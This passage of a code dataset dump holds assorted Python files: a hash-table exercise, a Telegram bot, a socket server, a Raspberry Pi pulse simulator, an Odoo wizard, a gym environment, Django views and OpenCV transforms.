From information given, it does not appear that\n # we would need to remove items from the list or resize the list\n # Insert is looking for hash_table, key, and value\n # Retrieve is looking hash_table and key\n\n # Want to be able to access key/value of source/destination\n for i in tickets:\n hash_table_insert(hashtable, i.source, i.destination)\n # Retrieve would be looking for hash_table_retrieve(hashtable, key)\n # If we are looking for the key of none, would place destination at route[i]\n # If key is not none, destination would be route[i - 1]?\n for i in range(length):\n # route[i] is None cannot be iterated over\n if route[i] is not None:\n # Current issue with this if statement as with printing,\n # it jumps right over to the else\n # Commented out print statement, not being printed\n # print(\"Route not None: \", route)\n hash_table_retrieve(hashtable, route[i - 1])\n else:\n # Code is jumping straight to the else statement\n # print(\"Route: \", route)\n hash_table_retrieve(hashtable, 'NONE')\n # Returning list of none equal to the amount of items supposed to be within the list\n # None is not being evaluated properly\n return route[1:]\n","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"348466838","text":"import telebot\nimport config\nimport sqlite3\nimport sys\nimport time\nimport random\nimport function\nimport db_function\nfrom telebot import types\n\nbot = telebot.TeleBot(config.token)\n\n\n@bot.message_handler(commands = [\"start\",\"group\"])\ndef question_group(message):\n\n\tgr = '0'\n\tbot.send_message(message.chat.id, 'В какой группе ты учишься?')\n\tdb_function.write_condition(message.chat.id, config.STATE.status_1, gr,message)\n\n@bot.message_handler(func=lambda message: db_function.give_condition(message.chat.id,message) == config.STATE.status_1)\ndef record_group(message):\n\n\tif db_function.check_group(message) == 1:\n\n\t\tfix = message.text.replace('-','')\n\t\tfix = fix.replace('А','A')\n\t\tgr =\"'\"+fix+\"'\"\n\t\tdb_function.write_condition(message.chat.id, config.STATE.status_2, gr, message)\n\t\tbot.send_message(message.chat.id, 'Теперь просто напиши мне, и я предложу тебе твое расписание')\n\t\tkeyboard = types.ReplyKeyboardMarkup(resize_keyboard = True)\n\t\tkeyboard.add(*[types.KeyboardButton(name) for name in ['Понедельник', 'Вторник', 'Среда','Четверг','Пятница','Суббота','На всю неделю']])\n\t\tmessage_answer = bot.send_message(message.chat.id,'Какой день недели тебя интересует?',reply_markup=keyboard)\n\n\telse:\n\n\t\tgr = '0'\n\t\tdb_function.write_condition(message.chat.id, config.STATE.status_1, gr, message)\n\t\tquestion_group(message)\n\n@bot.message_handler(func=lambda message: db_function.give_condition(message.chat.id,message) == config.STATE.status_2)\ndef give_data(message):\n\n\tconn = sqlite3.connect(config.database)\n\tday = message.text.capitalize()\n\n\tif day == 'Понедельник':\n\t\tfunction.Monday(message)\n\n\telif day == 'Вторник':\n\t\tfunction.Tuesday(message)\n\n\telif day == 'Среда':\n\t\tfunction.Wednesday(message)\n\n\telif day == 'Четверг':\n\t\tfunction.Thursday(message)\n\n\telif day == 'Пятница':\n\t\tfunction.Friday(message)\n\n\telif day == 'Суббота':\n\t\tfunction.Saturday(message)\n\n\telif message.text == 'На всю неделю':\n\n\t\ttry:\n\t\t\tbot.send_message(message.chat.id, 'ПОНЕДЕЛЬНИК:')\n\t\t\tfunction.Monday(message)\n\t\t\tbot.send_message(message.chat.id, 
'ВТОРНИК:')\n\t\t\tfunction.Tuesday(message)\n\t\t\tbot.send_message(message.chat.id, 'СРЕДА:')\n\t\t\tfunction.Wednesday(message)\n\t\t\tbot.send_message(message.chat.id, 'ЧЕТВЕРГ:')\n\t\t\tfunction.Thursday(message)\n\t\t\tbot.send_message(message.chat.id, 'ПЯТНИЦА:')\n\t\t\tfunction.Friday(message)\n\t\t\tbot.send_message(message.chat.id, 'СУББОТА:')\n\t\t\tfunction.Saturday(message)\n\t\texcept sqlite3.DatabaseError as err: \n\t\t\tprint(\"Error: \", err)\n\n\n\n\nif __name__ == '__main__':\n\tbot.polling(none_stop=True)\n\n","sub_path":"Bot_MPEI.py","file_name":"Bot_MPEI.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230578823","text":"#!/usr/bin/env python3\n# server\nimport socket\n\nHOST = '' # Symbolic name meaning all available interfaces\nPORT = 50007 # Arbitrary non-privileged port\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((HOST, PORT))\n\ncount = 0\nwhile (1):\n s.listen(1)\n # print type(s.accept())\n conn, addr = s.accept()\n print('Connected by', addr)\n\n tst = open('text' + str(count) + '.txt', 'w') # create new file\n count = count + 1\n while 1:\n data = conn.recv(1024)\n if data:\n tst.write(data.decode()) # write to file\n else:\n conn.close()\n tst.close()\n break","sub_path":"server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614762317","text":"class Node:\n def __init__(self, data):\n self.right = None\n self.left = None\n self.data = data\nclass Solution:\n def insert(self,root,data):\n if root == None:\n return Node(data)\n else:\n if data <= root.data:\n cur = self.insert(root.left, data)\n root.left = cur\n else:\n cur = self.insert(root.right, data)\n root.right = cur\n return root\n\n def getHeight(self, root):\n #Write your code here\n if not root:\n return -1\n\n if not root.left and not root.right:\n return 0\n\n height_left = self.getHeight(root.left)\n height_right = self.getHeight(root.right)\n\n return max(height_left, height_right) + 1\n\n\nT=7\nmyTree = Solution()\nroot = None\nfor i in range(T):\n data = [3, 5, 2, 1, 4, 6, 7]\n root = myTree.insert(root, data[i])\nheight = myTree.getHeight(root)\nprint(height)","sub_path":"src/22_binarySearchTree.py","file_name":"22_binarySearchTree.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459271674","text":"# -*- coding: utf-8 -*-\n# パルスシミュレーターの完成形プログラム\n\n\nimport pandas as pd\nimport csv\nfrom time import sleep # time モジュールから sleep メソッドを取得\nimport RPi.GPIO as GPIO\nimport platform\nGPIO.setmode(GPIO.BCM)\n\n# pandas でcsvデータの二次元表を取得\ncsv_dataframe = pd.read_csv(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv', sep=',', encoding='utf-8', index_col=False, header=None)\n\npf = platform.system()\n\nLinux_path = '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv'\nMac_path = '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simdata.csv'\n\nif pf == 'Linux':\n pulse_csv = open(Linux_path)\nelif pf == 'Darwin':\n pulse_csv = open(Mac_path)\n\n\n###########################################################################################\n# インデント減らしたい時、Shift + Tab\n\nPLpoat = [17, 27, 22]\n\nfor i in PLpoat:\n GPIO.setup(i, GPIO.OUT)\n\n\nPL1_sc1 = 
[]\nPL1_bc1 = []\nPL2_sc2 = []\nPL2_bc2 = []\nPL3_sc3 = []\nPL3_bc3 = []\n\nPL_sc = [PL1_sc1, PL2_sc2, PL3_sc3]\nPL_bc = [PL1_bc1, PL2_bc2, PL3_bc3]\n\n\nindex_PLsc = 0\nindex_PLbc = 0\n\nfor n in range(11):\n if n % 4 == 0:\n PL_sc[index_PLsc] = list(csv_dataframe[n])\n del PL_sc[index_PLsc][0:3]\n # replace で文字列内の余分な空白を削除\n PL_sc[index_PLsc] = [t.replace(\" \", \"\") for t in PL_sc[index_PLsc]]\n PL_sc[index_PLsc] = [a for a in PL_sc[index_PLsc]\n if a != ''] # リスト内の空白要素を削除\n PL_sc[index_PLsc] = [int(s)\n for s in PL_sc[index_PLsc]] # リスト要素 str を intに変換\n index_PLsc += 1\n\n elif n % 4 == 1:\n PL_bc[index_PLbc] = list(csv_dataframe[n])\n del PL_bc[index_PLbc][0:3]\n PL_bc[index_PLbc] = [t.replace(\" \", \"\") for t in PL_bc[index_PLbc]]\n PL_bc[index_PLbc] = [a for a in PL_bc[index_PLbc] if a != '']\n PL_bc[index_PLbc] = [int(s) for s in PL_bc[index_PLbc]]\n index_PLbc += 1\n else:\n pass\n\n\n# print(PL_sc)\n# print(PL_bc)\n\n########################################################################\n# インデント減らしたい時、Shift + Tab\n\nADpoat = [10, 9, 11]\n\nfor i in ADpoat:\n GPIO.setup(i, GPIO.OUT)\n\nAD1_sc1 = []\nAD1_bc1 = []\nAD2_sc2 = []\nAD2_bc2 = []\nAD3_sc3 = []\nAD3_bc3 = []\n\nAD_sc = [AD1_sc1, AD2_sc2, AD3_sc3]\nAD_bc = [AD1_bc1, AD2_bc2, AD3_bc3]\n\nindex_ADsc = 0\nindex_ADbc = 0\n\nfor n in range(13, 24):\n if n % 4 == 0:\n AD_sc[index_ADsc] = list(csv_dataframe[n])\n del AD_sc[index_ADsc][0:3]\n # reADace で文字列内の余分な空白を削除\n AD_sc[index_ADsc] = [t.replace(\" \", \"\") for t in AD_sc[index_ADsc]]\n AD_sc[index_ADsc] = [a for a in AD_sc[index_ADsc]\n if a != ''] # リスト内の空白要素を削除\n AD_sc[index_ADsc] = [int(s)\n for s in AD_sc[index_ADsc]] # リスト要素 str を intに変換\n index_ADsc += 1\n\n elif n % 4 == 1:\n AD_bc[index_ADbc] = list(csv_dataframe[n])\n del AD_bc[index_ADbc][0:3]\n AD_bc[index_ADbc] = [t.replace(\" \", \"\") for t in AD_bc[index_ADbc]]\n AD_bc[index_ADbc] = [a for a in AD_bc[index_ADbc] if a != '']\n AD_bc[index_ADbc] = [int(s) for s in AD_bc[index_ADbc]]\n index_ADbc += 1\n else:\n pass\n\n# print(AD_sc)\n# print(AD_bc)\n\n###########################################################################\n# DDS40bit データのシミュレーション\n\n# pandas でcsvデータの二次元表を取得\ncsv_DDSdataframe = pd.read_csv(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv', sep=',', encoding='utf-8', index_col=False, header=None)\n\n\nif pf == 'Linux':\n dds_csv = open(\n '/home/ubuntu/Documents/Python/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv')\nelif pf == 'Darwin':\n dds_csv = open(\n '/Users/yokooannosuke/Cording/Pine64-python--pulse/Pulsesimulator/usual/pulse_simDDSdata.csv')\n\nDDSpoat = [26, 19]\n\n\nfor i in range(len(DDSpoat)):\n GPIO.setup(DDSpoat[i], GPIO.OUT)\n\n\nDDS1_sc = []\nDDS1_data = []\nDDS2_sc = []\nDDS2_data = []\n\nDDS_sc = [DDS1_sc, DDS2_sc]\nDDS_data = [DDS1_data, DDS2_data]\n\nindex_DDSsc = 0\nindex_DDSdata = 0\n\nhinann = []\n\nfor n in range(14):\n if n % 8 == 0: # DDSscについての記述\n DDS_sc[index_DDSsc] = list(csv_DDSdataframe[n])\n del DDS_sc[index_DDSsc][0:3]\n DDS_sc[index_DDSsc] = [t.replace(\" \", \"\") for t in DDS_sc[index_DDSsc]]\n DDS_sc[index_DDSsc] = [a for a in DDS_sc[index_DDSsc]\n if a != '']\n DDS_sc[index_DDSsc] = [int(s)\n for s in DDS_sc[index_DDSsc]] # リスト要素 str を intに変換\n index_DDSsc += 1\n\n elif n % 8 == 4:\n DDS_data[index_DDSdata] = list(csv_DDSdataframe[n])\n del DDS_data[index_DDSdata][0:3]\n\n for i in range(len(DDS_data[index_DDSdata])):\n chars = DDS_data[index_DDSdata][i]\n\n DDS_data[index_DDSdata][i] = 
list(chars)\n hinann.append(DDS_data[index_DDSdata][i])\n DDS_data[index_DDSdata][i] = [a for a in hinann[-1]\n if a != ' ']\n DDS_data[index_DDSdata][i] = [int(s)\n for s in DDS_data[index_DDSdata][i]]\n index_DDSdata += 1\n\n else:\n pass\n\n# print(DDS_sc)\n# print(DDS_data)\n\n########################################################################################\n\n\ncounter = 0\nindex = [0 for i in range(8)]\nx = 0 # sc1_intのインデックス\nk = 0 # DDSsc1_intのインデックス\n\nwhile True:\n while counter <= max(max(PL_sc, AD_sc, DDS_sc, key=max)):\n if counter <= PL1_sc1[-1]:\n if PL1_sc1[index[0]] == counter:\n GPIO.output(PLpoat[0], 1)\n sleep(PL1_bc1[index[0]] * 0.001)\n index[0] += 1\n print('%d' % counter) # end=':PL1出力中')\n\n if counter <= PL2_sc2[-1]:\n if PL2_sc2[index[1]] == counter:\n GPIO.output(PLpoat[1], 1)\n sleep(PL2_bc2[index[1]] * 0.001)\n index[1] += 1\n print('%d' % counter) # end=':PL2出力中')\n\n if counter <= PL3_sc3[-1]:\n if PL3_sc3[index[2]] == counter:\n GPIO.output(PLpoat[2], 1)\n sleep(PL3_bc3[index[2]] * 0.001)\n index[2] += 1\n print('%d' % counter) # end=':PL3出力中')\n\n\n#############################################################\n\n if counter <= AD1_sc1[-1]:\n if AD1_sc1[index[3]] == counter:\n GPIO.output(ADpoat[0], 1)\n sleep(AD1_bc1[index[3]] * 0.001)\n index[3] += 1\n print('%d' % counter) # end=':AD1出力中')\n\n if counter <= AD2_sc2[-1]:\n if AD2_sc2[index[4]] == counter:\n GPIO.output(ADpoat[1], 1)\n sleep(AD2_bc2[index[4]] * 0.001)\n index[4] += 1\n print('%d' % counter) # end=':AD2出力中')\n\n if counter <= AD3_sc3[-1]:\n if AD3_sc3[index[5]] == counter:\n GPIO.output(ADpoat[2], 1)\n sleep(AD3_bc3[index[5]] * 0.001)\n index[5] += 1\n print('%d' % counter) # end=':AD3出力中')\n\n\n##############################################################\n\n if DDS1_sc[k] == counter:\n for m in range(len(DDS1_data[k])):\n GPIO.output(DDSpoat[0], DDS1_data[k][m])\n sleep(0.5)\n print('%d' % counter) # end=':DDS1出力中')\n k += 1\n\n if DDS2_sc[x] == counter:\n for m in range(len(DDS2_data[x])):\n GPIO.output(DDSpoat[1], DDS2_data[x][m])\n sleep(0.5)\n print('%d' % counter) # end=':DDS2出力中')\n x += 1\n\n else:\n GPIO.output(PLpoat[0], 0)\n GPIO.output(PLpoat[1], 0)\n GPIO.output(PLpoat[2], 0)\n\n GPIO.output(ADpoat[0], 0)\n GPIO.output(ADpoat[1], 0)\n GPIO.output(ADpoat[2], 0)\n\n GPIO.output(DDSpoat[0], 0)\n GPIO.output(DDSpoat[1], 0)\n\n sleep(0.5)\n print('%d' % counter) # end=':LOWlevel')\n\n counter += 1\n # print(counter)\n else:\n counter = 0\n index = [0 for i in range(8)]\n k = 0\n x = 0\n\n\nGPIO.cleanup()\n","sub_path":"Pulsesimulator/main_simulator/pulsesim.py","file_name":"pulsesim.py","file_ext":"py","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645764403","text":"from mixpanel import Mixpanel\nfrom bluebottle.clients import properties\n\n\ndef bb_track(title=\"\", data={}):\n \"\"\"\n Wrapper function for backend mixpanel tracking.\n One day we may be able to refactor this to the adapter pattern for\n multiple metrics.\n \"\"\"\n if not title:\n return False\n\n mp = None\n key = getattr(properties, 'MIXPANEL', None)\n\n if key:\n mp = Mixpanel(key)\n else:\n return False\n\n if mp:\n mp.track(None, title, data)\n","sub_path":"bluebottle/bb_metrics/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91896215","text":"\n\nfrom odoo import api, fields, models, 
_\nfrom odoo.exceptions import UserError\n\nclass ProductBarcodeWizard(models.TransientModel):\n _name ='product.barcode.wizard'\n _description ='product.barcode.wizard'\n \n def _prod_calc(self):\n product=self.env['product.product'].browse(self._context.get('active_ids'))\n # barcode=self.env['product.barcode.line.wizard'].create([{'product_id'}])\n barcode = []\n for line in product:\n # valores=\"\"\n # if line.attribute_value_ids:\n # x=0\n # for a in line.attribute_value_ids:\n # if x==0:\n # valores=a.name\n # else:\n # valores = valores+', '+a.name\n # x+=1\n # producto_name=str(line.name)+' '+'('+ str(valores)+')'\n # line.name = producto_name\n barcode.append(self.env['product.barcode.line.wizard'].create({'product_id':line.id}).id)\n return barcode\n \n pricelist_id = fields.Many2one(comodel_name='product.pricelist', string='Tarifa')\n location_id = fields.Many2one(comodel_name='stock.location', string='Ucicacion', domain=[('usage','=','internal')])\n line_ids = fields.Many2many( 'product.barcode.line.wizard',string='Lineas de productos', default=_prod_calc)\n clase_prod = fields.Char(string='classs')\n \n @api.onchange('pricelist_id')\n def onchange_pricelist(self):\n product=self.env['product.product'].browse(self._context.get('active_ids'))\n if self.pricelist_id:\n values = []\n for prod in product:\n price = self.pricelist_id.get_product_price(prod, 1, False)\n values.append((0,0, {'product_id': prod, 'price_unit': price, 'quantity': 1 }))\n self.line_ids = [(5,0,0)]\n self.line_ids = values\n\n @api.multi\n def generate_report(self):\n \"\"\"\n To get the date and print the report\n @return: return report\n \"\"\"\n self.ensure_one()\n print('CONTEXT: ', self.env.context)\n data = {'ids': self.env.context.get('active_ids', [])}\n res = self.read()\n res = res and res[0] or {}\n data.update({'form': res})\n print('DATA: ', data)\n return self.env.ref('fuci_base.action_barcode_report').report_action(self, data=data)\n\n \n \n \n \n\n\n \n \n \n \n ","sub_path":"fuci_base/wizards/product_barcode.py","file_name":"product_barcode.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517271306","text":"import time\nimport pyglet\nimport gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport numpy as np\nimport cv2\nimport h5py\nfrom copy import deepcopy\n\nACTION_MEANING = {\n 0 : \"RIGHT\",\\\n 1 : \"LEFT\",\\\n 2 : \"DOWN\",\\\n 3 : \"UP\",\\\n}\n\nclass ImgRegTrainv2(gym.Env):\n def __init__(self):\n self.viewer = None\n self.height, self.width = 64, 64\n self.observation_space = spaces.Box(low = 0, high = 1.0, shape= (2, self.height, self.width))\n self.bound = 25\n self.action_space = spaces.Discrete(4)\n self.registered = False\n self.max_steps = 50\n self.max_steps_min = 50\n self.close = 5\n self.epochs = 1\n self.steps = 0\n self.track_reward = 0.0\n\n def _step(self, action):\n self.steps += 1\n reward = self.act(int(action))\n ob = self._get_obs()\n return ob, reward, self.registered, {'Hi' : 'boss'}\n\n def preprocess(self, state):\n return state / 255.0\n\n def _reset(self):\n self.initialize()\n self.state = self.preprocess(np.stack([self.def_image, self.trans_image], axis = 0))\n self.registered = False\n self.tstate = np.float32([0, 0])\n self.steps = 0\n\n return self._get_obs()\n\n def _get_obs(self):\n return self.state\n\t\n def _get_image(self):\n return 255 * self.state\n\n def initialize(self):\n print(\"Number of steps = 
{}/{}\".format(self.steps, self.max_steps))\n print(\"Episode-{} in epoch {}, reward = {}\".format(self.count_in_epoch, self.epochs, self.track_reward))\n self.track_reward = 0.0\n self.ref_image = deepcopy(self.X[self.count_in_epoch][0])\n self.def_image = deepcopy(self.X[self.count_in_epoch][1])\n self.trans_image = deepcopy(self.ref_image)\n self.target = np.float32(self.Y[self.count_in_epoch])\n\n self.count_in_epoch += 1\n\n if self.count_in_epoch % 25 == 0:\n if self.max_steps > self.max_steps_min:\n self.max_steps -= 1\n\n if self.count_in_epoch == self.X.shape[0]:\n self.count_in_epoch = 0\n self.epochs += 1\n x = np.arange(self.X.shape[0])\n np.random.shuffle(x)\n self.X, self.Y = self.X[x], self.Y[x]\n\n def act(self, action):\n # Get direction of action\n old_tstate = deepcopy(self.tstate)\n direction = int(action / 2)\n sign = 1 if action % 2 == 0 else -1\n update = self.tstate[direction] + sign\n # Check bound \n if np.abs(update) <= self.bound:\n self.tstate[direction] = update\n # The action\n self.tmatrix = np.float32([[1, 0, self.tstate[0]], [0, 1, self.tstate[1]]])\n self.trans_image = cv2.warpAffine(self.ref_image, self.tmatrix, (self.height, self.width))\n self.state = self.preprocess(np.stack([self.def_image, self.trans_image], axis = 0))\n\n # Rewards\n D_old = np.abs(old_tstate[direction] - self.target[direction])\n D_new = np.abs(self.tstate[direction] - self.target[direction])\n reward = (D_old * D_old - D_new * D_new) / (2 * self.bound + 1)\n D = np.max(np.abs(self.tstate - self.target))\n\n # Additional rewards\n if D == 0:\n reward += 5.0\n terminate = True\n else:\n terminate = False\n\n # Episode termination\n if terminate == True or self.steps == self.max_steps:\n self.registered = True\n \n #if self.count_in_epoch % 50 == 0:\n # self.render()\n # time.sleep(0.1)\n # #print(\"Action = {}, old = {}, new = {}, reward = {}\".format(ACTION_MEANING[action], old_tstate, self.tstate, reward))\n\n self.track_reward += reward\n return reward\n\n def loadData(self, data_path):\n dataset = h5py.File(data_path, 'r')\n self.X, self.Y = dataset['X'][:], dataset['Y'][:]\n self.count_in_epoch = 0\n print(\"size of the data:\", self.X.shape)\n\n def render(self, mode = 'human', close = False):\n img = self._get_image()\n if self.viewer is None:\n self.viewer = SimpleImageViewer()\n self.viewer.imshow(img)\n\nclass SimpleImageViewer(object):\n def __init__(self, display=None):\n self.window = None\n self.isopen = False\n self.display = display\n def imshow(self, arr):\n def_image, trans_image = arr[0], arr[1]\n image = np.zeros((64, 64))\n image += def_image / 3\n image += trans_image\n if self.window is None:\n height, width = image.shape\n self.window = pyglet.window.Window(width = 5 * width, height = 5 * height, display = self.display)\n self.width = width\n self.height = height\n self.isopen = True\n cv2.imwrite('image.jpg', image)\n image = cv2.imread('image.jpg', 0)\n image = pyglet.image.ImageData(self.width, self.height, 'I', image.tobytes(), pitch = self.width * -1)\n self.window.clear()\n self.window.switch_to()\n self.window.dispatch_events()\n image.blit(2 * self.width, 2 * self.height)\n self.window.flip()\n\n def close(self):\n if self.isopen:\n self.window.close()\n self.isopen = False\n def __del__(self):\n self.close()\n\n","sub_path":"imgreg/imgreg/envs/imgreg_train_v2_env.py","file_name":"imgreg_train_v2_env.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
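Editor's note: the ImgRegTrainv2 record above targets the pre-0.9 gym API, where Env.reset()/step() dispatch to the _reset()/_step() methods defined in the class. A minimal driving loop is sketched below; the underscore methods are called directly to avoid depending on the gym version, and the HDF5 path is hypothetical (the file must hold the 'X' image pairs and 'Y' target translations that loadData expects):

    env = ImgRegTrainv2()
    env.loadData('imgreg_pairs.h5')   # hypothetical file with 'X' and 'Y' datasets
    ob = env._reset()                 # stacked (2, 64, 64) observation: deformed + transformed image
    done, total_reward = False, 0.0
    while not done:
        action = env.action_space.sample()       # 0-3: RIGHT / LEFT / DOWN / UP
        ob, reward, done, info = env._step(action)
        total_reward += reward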
+{"seq_id":"272082468","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Sighting\nfrom django.template import loader\nfrom django.shortcuts import redirect\nfrom .forms import SightingForm\n\ndef index(request):\n \n latest_sighting_list = Sighting.objects.all()\n template = loader.get_template('sightings/index.html')\n context = {\n 'latest_sighting_list': latest_sighting_list,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef add(request):\n if request.method == 'POST':\n form = SightingForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(f'/sightings/')\n else:\n form = SightingForm()\n context = {\n 'form': form,\n }\n return render(request, 'sightings/details.html', context)\n\ndef stats(request):\n template = loader.get_template('sightings/stats.html')\n total_number = Sighting.objects.all().count()\n pm_shift = Sighting.objects.filter(shift='PM').count()\n am_shift = Sighting.objects.filter(shift='AM').count()\n num_of_adults = Sighting.objects.filter(age='Adult').count()\n num_of_juveniles = Sighting.objects.filter(age='Juvenile').count()\n num_of_climbing = Sighting.objects.filter(climbing = True).count()\n context = {\n 'total_number': total_number,\n 'pm_shift': pm_shift,\n 'am_shift': am_shift,\n 'num_of_adults': num_of_adults,\n 'num_of_juveniles':num_of_juveniles,\n 'num_of_climbing': num_of_climbing,\n }\n return HttpResponse(template.render(context, request))\n\ndef details(request, unique_squirrel_id):\n sighting = Sighting.objects.get(unique_squirrel_id = unique_squirrel_id)\n if request.method == 'POST':\n form = SightingForm(request.POST, instance = sighting)\n if form.is_valid():\n form.save()\n return redirect(f'/sightings/')\n else:\n form = SightingForm(instance=sighting)\n context = {\n 'form': form,\n }\n return render(request, 'sightings/details.html', context)\n\n\n","sub_path":"sightings/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"33372360","text":"from __future__ import division\n\nimport cv2\nimport torch\nimport random\nimport numbers\n\n__all__ = [\"Compose\", \"ToTensor\", \"Normalize\", \"Resize\", \"CenterCrop\", \"RandomCrop\", \"RandomHorizontalFlip\"]\n\n\n_cv2_interpolation_to_str = {\n cv2.INTER_NEAREST: 'cv2.INTER_NEAREST',\n cv2.INTER_LINEAR: 'cv2.INTER_LINEAR',\n cv2.INTER_AREA: 'cv2.INTER_AREA',\n cv2.INTER_CUBIC: 'cv2.INTER_CUBIC',\n cv2.INTER_LANCZOS4: 'cv2.INTER_LANCZOS4',\n}\n\n\nclass Compose(object):\n \"\"\"Composes several transforms together.\n\n Args:\n transforms (list of ``Transform`` objects): list of transforms to compose.\n\n Example:\n >>> transforms.Compose([\n >>> transforms.CenterCrop(10),\n >>> transforms.ToTensor(),\n >>> ])\n \"\"\"\n\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img):\n for t in self.transforms:\n img = t(img)\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n for t in self.transforms:\n format_string += '\\n'\n format_string += ' {0}'.format(t)\n format_string += '\\n)'\n return format_string\n\n\nclass ToTensor(object):\n \"\"\"Convert a ``PIL Image`` or ``numpy.ndarray`` to tensor.\n\n Converts a PIL Image or numpy.ndarray (H x W x C) in the range\n [0, 255] to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0].\n \"\"\"\n\n def __call__(self, array):\n \"\"\"\n Args:\n np.array: array to 
be converted to tensor.\n\n Returns:\n Tensor: Converted array.\n \"\"\"\n array = torch.from_numpy(array.transpose((2, 0, 1)))\n return array.float().div(255.)\n\n def __repr__(self):\n return self.__class__.__name__ + '()'\n\n\nclass Normalize(object):\n \"\"\"Normalize a tensor image with mean and standard deviation.\n Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this transform\n will normalize each channel of the input ``torch.*Tensor`` i.e.\n ``input[channel] = (input[channel] - mean[channel]) / std[channel]``\n\n Args:\n mean (sequence): Sequence of means for each channel.\n std (sequence): Sequence of standard deviations for each channel.\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, tensor):\n \"\"\"\n Args:\n tensor (Tensor): Tensor array of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized Tensor array.\n \"\"\"\n for t, m, s in zip(tensor, self.mean, self.std):\n t.sub_(m).div_(s)\n return tensor\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\nclass Resize(object):\n \"\"\"Resize the input PIL Image to the given size.\n\n Args:\n size (sequence or int): Desired output size. If size is a sequence like\n (h, w), output size will be matched to this. If size is an int,\n smaller edge of the image will be matched to this number.\n i.e, if height > width, then image will be rescaled to\n (size * height / width, size)\n interpolation (int, optional): Desired interpolation. Default is\n ``PIL.Image.BILINEAR``\n \"\"\"\n\n def __init__(self, size, interpolation=cv2.INTER_LINEAR):\n assert isinstance(size, int) or (isinstance(size, tuple) and len(size) == 2)\n self.size = size\n self.interpolation = interpolation\n\n def __call__(self, array):\n \"\"\"\n Args:\n array : np.array to be scaled.\n\n Returns:\n np.array: Rescaled array.\n \"\"\"\n if isinstance(self.size, int):\n h, w = array.shape[0], array.shape[1]\n if (w <= h and w == self.size) or (h <= w and h == self.size):\n return array\n if w < h:\n ow = self.size\n oh = int(self.size * h / w)\n return cv2.resize(array, (ow, oh), self.interpolation)\n else:\n oh = self.size\n ow = int(self.size * w / h)\n return cv2.resize(array, (ow, oh), self.interpolation)\n else:\n return cv2.resize(array, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = _cv2_interpolation_to_str[self.interpolation]\n return self.__class__.__name__ + '(size={0}, interpolation={1})'.format(self.size, interpolate_str)\n\n\nclass CenterCrop(object):\n \"\"\"Crops the given PIL Image at the center.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made.\n \"\"\"\n\n def __init__(self, size):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n\n def __call__(self, array):\n \"\"\"\n Args:\n np.array: array to be cropped.\n\n Returns:\n np.array: Cropped array.\n \"\"\"\n h, w = array.shape[0], array.shape[1]\n ow, oh = self.size[0], self.size[1]\n i = (h-oh)//2\n j = (w-ow)//2\n\n return array[i:i+oh, j:j+ow]\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass RandomCrop(object):\n \"\"\"Crop the given PIL Image at a random location.\n\n Args:\n size (sequence or int): Desired output size of the crop. 
If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made.\n padding (int or sequence, optional): Optional padding on each border\n of the image. Default is 0, i.e no padding. If a sequence of length\n 4 is provided, it is used to pad left, top, right, bottom borders\n respectively.\n pad_if_needed (boolean): It will pad the image if smaller than the\n desired size to avoid raising an exception.\n \"\"\"\n\n def __init__(self, size, padding=0, pad_if_needed=False):\n if isinstance(size, numbers.Number):\n self.size = (int(size), int(size))\n else:\n self.size = size\n self.padding = padding\n self.pad_if_needed = pad_if_needed\n\n @staticmethod\n def get_params(array, output_size):\n \"\"\"Get parameters for ``crop`` for a random crop.\n\n Args:\n array : np array to be cropped.\n output_size (tuple): Expected output size of the crop.\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.\n \"\"\"\n\n h, w = array.shape[0], array.shape[1]\n tw, th = output_size\n if w == tw and h == th:\n return 